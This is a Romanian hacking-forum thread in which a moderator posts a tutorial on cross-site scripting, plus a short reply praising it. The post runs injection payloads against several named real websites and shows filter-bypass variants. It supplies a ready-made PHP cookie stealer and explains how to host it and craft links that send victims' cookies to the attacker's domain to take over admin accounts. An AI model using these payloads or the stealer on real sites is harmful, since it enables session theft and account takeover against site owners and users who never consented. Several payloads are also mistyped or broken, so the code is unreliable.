EliteHackers 
			SALUT 2022!! 
NE-AM MUTAT PE DISCORD !
Vrei să inviți un prieten?
[T]eoria [H]aosului [C]ontrolat - https://discord.com/invite/U4HBCHzm7r
Acesta aste link-ul oficial al acestui server.
		 | 
		
			Lista Forumurilor Pe Tematici
		 | 
	
	
		
			EliteHackers | Reguli | Inregistrare | Login
   POZE ELITEHACKERS
  
			Nu sunteti logat.
		 | 
	
	Nou pe simpatie: Alexandra21 la Simpatie.ro
   | Femeie 24 ani Calarasi cauta Barbat 24 - 53 ani |   
	 | 
	
	
		
			
				
					
						
							Puscas_marin
							Moderator
							  Inregistrat: acum 18 ani 
							Postari: 315
						  
					 | 
				 
			 
		 | 
		
			
				
					
						 Datoriata exprimarii anevoioase si datelor incomplete m-am gandit sa refac vechiul tutorial "DESPRE XSS @2006-2007"
 
  [center][size=100] ------------------------------- AUTOR:Puscas_marin ------------------------------- [/size][/center]
 
  1.Ce este Xss? si la ce foloste? R1. Xss([color=blue]Cross-site scripting) a aprut pentru prima data in 1996 si de obicei este este legata de cookieuri si message boxuri.XSS este o vulnerabilitate pe un server, ce permite introducerea unui script pe pagina HTML de pe un server[/color] R2. Im prima faza am putea zice ca nu foloste la nimic un textbox inserat in  script, dar daca stam sa ne gandim si sa avansam putin in Xss vedem ca are legatura cu "prajiturelele"(cookie), deci dupa cum stiti cookie este un text care pleaca din browserul tau inspre site si se intoarce inapoi neschimbat, daca reusim sa furam cookie-ul de la un admin avem pe acel site aces la admin panel, o putem folosi la redirectionare inserarea unor poze etc. 2.De ce apre Xss si unde apare? R. Xss apre din cauza filtrari proaste a codului sau in multe cazuri nu se filtreaza chiar deloc.
  [color=Aquamarine]OK dupa mica introducere care este si in celalat tutorial o sa trec direct la exmple clare: [center]ALERT[/center] 1.O sa luam un site pe care sa il testam daca este vulnerabil la XSS www.seriall.com Pentru testarea vulnerabilitati  xss majoriattea atacatorilor se folosesc de
 
 Code:
 
 <script>alert("xss")</script> |  
  sau
 
 Code:
 
 "><script>alert("xss")</script> --> acesta este folosit in cazul in care "input" nu este inchis |  
  Pentru a testa daca acest site exte vulnerabil la "Cross-site scripting" vom incerca sa injectam un mesaj de alerta "alert('xss')" , cum o sa injectam acest mesaj? care sa apara utilizatorului? o sa folosim <script> </script> Ok acum o sa verificam daca se filtreaza  "  < > /  '  ".
  O sa folosim search deoarece este de obicei cel mai vulnerabil ok sa introducem in
 
 Code:
 
 TextBox:xxxxx< / >xxxxx  |  
  --> acum click pe Search si sa ne uitam in sursa paginii --> Source
 
 Code:
 
 <input name="s" type="text" size="20" maxlength="80" value="xxxxx< / >xxxxx">  |  
  BINGO NU SE FILTREAZA :d ok sa inseram "alertul"
 
 Code:
 
 <script>alert(/Puscas_marin test xss</script>  |  
  Fiindca Site-ul ales de noi foloseste metoda "GET" pentru a prelua datele de la utilizator, se poate foarte usor sa modificam din browser URL-u; Url-ul modificat din browser:http://www.seriall.com/?s=<script>alert(/Puscas_marin test xss</script>
  ScreenShot
 
 
  2. Haideti sa incercam inca pe un site metoda de mai sus Crackfind.com  Deci o sa incercam direct sa inseram
 
 Code:
 
 <script>alert('Puscas_marin test xss')</script> |  
  Ok cred ca deja ati observat ca acest site primeste datele prin metoda "POST" nemodifican URL in rest e la fel ca si la celatat exemplu nu se filtreaza deloc codul ScreenShot
 
 
  3.Haideti sa Vedem daca mai reusim inca pe un site de exmplu http://pnl.ro ( sunt apolitic pur si simplu cautam ceva si am vazut ca e vulnerabil)
 
 Code:
 
 http://pnl.ro/?id=search  |  
  acum haideti sa inseram <script>alert("Puscas_marin test xss" </script> hmmmmm................. nu merge    ScreenShoot
 
  Ia sa vedem ce zice sursa paginii
 
 Code:
 
 <INPUT type="text" size="30" class="LargeInput" name="expr" value="<script>alert(\"Puscas_marin test xss\")</script>  |  
  Hmmmm  caracterul " sa transformat in \" ----> atunci o sa folosim \ in loc de " ok hai sa vedem   deci o sa introducem acest cod
 
 Code:
 
 <script>alert(\Puscas_marin test xss\)</script>  |  
  in loc de
 
 Code:
 
 <script>alert("Puscas_marin test xss")</script> |  
  Hm dar tot nu merge haideti sa ne uitam iar in sursa paginii :P
 
 Code:
 
 <INPUT type="text" size="30" class="LargeInput" name="expr" value="<script>alert(/Puscas_marin test xss/)</script>" style="width:200">  |  
  Hm haideti sa inchidem input prin "> astfel
 
 Code:
 
 <script>alert(/xss/)</script>  |  
  nu va mai fi luat ca "value" deoarece aceasta este inchisa prin ">  value = " "> iar <script>alert(\Puscas_marin test xss\)</script> este luat ca text si executat de browser   ok deci codul nostru va arata astfel
 
 Code:
 
 "><script>alert(\Puscas_marin test xss\)</script><  |  
  Acum input-ul din sursa pagini va arta astfel :d
 
 Code:
 
 <INPUT type="text" size="30" class="LargeInput" name="expr" value=" "><script>alert(/Puscas_marin test xss/)</script>  |  
  deci acum avem "alert-ul"
  PS aca caracterul " este transformat in \" se poate folosi si Javascript caracter code
 
 Code:
 
 "><script>alert(String.fromCharCode(80,85,83,67,65,83))</script>  |  
  Toate caracterele necesare le gasiti Aici
  VOILA!!!!! [color=red]ScreenShoot 1
  ScreenShoot 2
 
  4. Sper sa gasesc si alte site-uri in care se flitreaza partial codul ca sa va arat, dar pana atunci o sa mia dureze caci momentan nu am timp.
 
  Alte coduri care o sa va fie necesare
 
 Code:
 
 <IMG SRC=javascript:alert(String.fromCharCode(88,83,83) )>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
</textarea><script>alert(/xss/)</script>
</title><script>alert(/xss/)</script> |  
  [center]INSERAREA UNEI IMAGINI[/center]
  1.seriall.com acesta este primul exemplu de inserarea a unei imagini  
 
 Code:
 
 <img src="imagine.gif/jpg/png/etc."  |  
  Acesta este codul pentru "introducerea" unei imagini in site-ul vulenrabil la XSS. imaginea noastra estehttp://img519.imageshack.us/img519/8404/opozanl3.png Ok deci codul care vrem sa il injectam noi va arata astfel
 
 Code:
 
 <img src="http://img519.imageshack.us/img519/8404/opozanl3.png">  |  
  iar daca dorim sa ii punem si text de exemplu "Puscas" va arata astfel
 
 Code:
 
 <img src="http://img519.imageshack.us/img519/8404/opozanl3.png" ALT="Puscas">  |  
  ScreenShoot 1
  ScreenShoot 2
 
  2.Sa incercam aceeasi treaba si pe crackfind.com Deci codul nostru va fi acesta:
 
 Code:
 
 <img src="http://img519.imageshack.us/img519/8404/opozanl3.png" ALT="Puscas">  |  
  !!!.........hm ca si la exemplu de mai sus cu alert nu merge.....sa ne uitam prin sursa paginii.....
 
 Code:
 
 input size=30 name=chto value="<img src="hhttp://img519.imageshack.us/img519/8404/opozanl3.png" ALT="Puscas">">  |  
  asa arata "input-ul" cred ca ati observat ca se dubleaza "> la inchidere deci hadeti sa scapam de el :d, tot ce trebuie sa facem este sa renuntam in codul nostru la "> deoarece el deja exista :d  Noul nostru cod:"><img src="http://img519.imageshack.us/img519/8404/opozanl3.png" ALT="Puscas[/b] --> va fi acesta haideti sa incercam   de ce am pus inaite si "> ? ca sa inchid input altfel nu va merge :P
  Iata!!! ScreenShoot
 
  [center]Cookies[/center] ******Acest sub punc se va inparti in 2 categorii:****** *****************I.Aflarea cookie*************** *****************II.Furtul   cookie*************** I) 1.seriall.com Ce este un cookie? Cookie-urile reprezinta un mecanism standard care permite ca un server (site) Web sa trimita anumite informatii pe calculatorul unui client (utilizator), prin intermediul browserului, sa ceara clientului sa stocheze aceste informatii pentru ca, ulterior, in diferite circumstante, navigatorul sa returneze informatiile spre serverul curent 
  Dar ca sa intelegeti mai usor puteti vedea un cookie ca un sir de caractere care stoicheaza datele acesarii dumneavoastra catre un anumit server pentru a putea fi folosite la urmatoarea cerere 
  Codul care o sa il injectam noi pentru a putea vedea cookie-ul personal este acesta<script>alert(document.cookie)</script>
  Linck-ul nostru va arta astfel:
 
 Code:
 
 http://www.seriall.com/?s=<script>alert(document.cookie)</script>  |  
  ScreenShoot
 
  De ce apare un mesaj de alaerta fara nici un text? deoarece noi nu am trimis nimic despre noi care acel server, dar sa vedem in exemplul urmator.
  2.http://cookies.forumz.ro Unde apare xssla semnalare abuz chiar aici http://cookies.forumz.ro/report_abuse.forum?page= Ok haide-ti sa injectam cod pentru alerta cookie :d
 
 Code:
 
 http://cookies.forumz.ro/report_abuse.forum?page=</script>alert(document.cookie)</script>  |  
  ScreenShoot
 
  II)
  Ok deci haideti sa trecem la cookie stealer.... deci os a va arat pe exemplul de mai sus cum vine.... Ok avem nevoie de un cookie stealer...necesita cunostinte minime de php... o sa va ofer eu unul simplu gata facut  
 
 Code:
 
 <?php
    $cookie = $HTTP_GET_VARS["cookie"];
    $name = $HTTP_GET_VARS["name"];
    $file = fopen('cookielog.txt', 'a');
    if(!empty($cookie) && !empty($name))
        fwrite($file, "Cookie=" . $cookie . chr(13) . chr(10) . "Name=" . $name . chr(13) . chr(10) . chr(13) . chr(10));
?> |  
  Acum acest codul il salvam ca nume.php si mai creeam un document cu numele cookielog.txt. Le uploadam abmele pe un host personal(ex :hostmax.us)  la fiserul .txt o sa ii dam permisiune 777.
  Haideti sa va arat cum formati link-ul  
 
 Code:
 
 http://cookies.forumz.ro/report_abuse.forum?page= AICI VA VENI STEALERUL VOSTRU  |  
  Stealerul vostru fiind acesta [b]http://domeniu/nume.php?cookie='+escape(document.cookie)[b]
  o simpla metoda de a va putea pune cookie este aceasta:
  1.<script>Link-ul vostru </script> sau 2<a href="javascript:document.location=''linck-ul vostru"> Faceţi clic aici! </ a>                
  Atentie:// Datoriata modificarii caracterului " in \" nu se poate fura cookie-ul respectiv ...... o sa gasesc un alt exemplu pe parcurs si o sa va prezint   sau poate veniti voi cu o propunere.
  Redirectarii
 
 Code:
 
 windows.location="site redirect"  |  
  Momentan aici se termina tutorialul..... este facut in pe fuga ma refe la ultima parte ceea ce priveste cookie dar promit ca o sa il refac pe parcurs  
  Va rog semanlati toate greselile de scriere.....si nu faceti amre tam-tam cu ele nu am timp sa il recorectez .....
  Va rog Veniti cu idei noi....unde va incurcati spuneti si o sa explic iarasi, stiu ca am o exprimare destul de anevoioasa  
  _______________________________________ Deci asa se fac banii....da clik sa vezi
  
					 | 
				 
			 
		 | 
	
	
		| pus acum 17 ani | 
		
			
		 | 
	
	
		
			
				
					| 
						 
							Hezekiah 
							EliteHackers Member
  
							Inregistrat: acum 16 ani 
							Postari: 14
						 
					 | 
				 
			 
		 | 
		
			
				
					
						Mortalllllllll bravo frate tineo tot asha      
  
					 | 
				 
			 
		 | 
	
	
		| pus acum 16 ani | 
		
			
		 |